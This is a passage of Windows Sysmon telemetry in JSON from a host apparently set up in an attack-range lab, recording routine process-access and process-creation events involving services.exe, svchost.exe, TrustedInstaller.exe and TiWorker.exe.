C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5366,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00105D520800}","TargetProcessId":"3592","TargetImage":"C:\\Windows\\servicing\\TrustedInstaller.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5367,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.219\r\nProcessGuid: {41C8662E-20D2-5F25-0000-00101E540800}\r\nProcessId: 4976\r\nImage: C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nFileVersion: 10.0.14393.3801 (rs1_release.200610-1742)\r\nDescription: Windows Modules Installer Worker\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: TiWorker.exe\r\nCommandLine: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19\r\nParentProcessGuid: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nParentProcessId: 612\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.219","ProcessGuid":"{41C8662E-20D2-5F25-0000-00101E540800}","Image":"C:\\Windows\\WinSxS\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","FileVersion":"10.0.14393.3801 (rs1_release.200610-1742)","Description":"Windows Modules Installer Worker","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"TiWorker.exe","CommandLine":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=0CE9C52C23CA8BE3667A9FEFDE41FC15,SHA256=54B3EE99CA831ED9249669FDB9510CAF202F97ED816FA15D4B4791F86760C8E1,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19","ParentProcessGuid":"{41C8662E-1F63-5F25-0000-0010C3650000}","ParentProcessId":"612","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5368,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5369,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00101E540800}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-00101E540800}","TargetProcessId":"4976","TargetImage":"C:\\Windows\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3801_none_7ed07ae422175cd5\\TiWorker.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5370,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 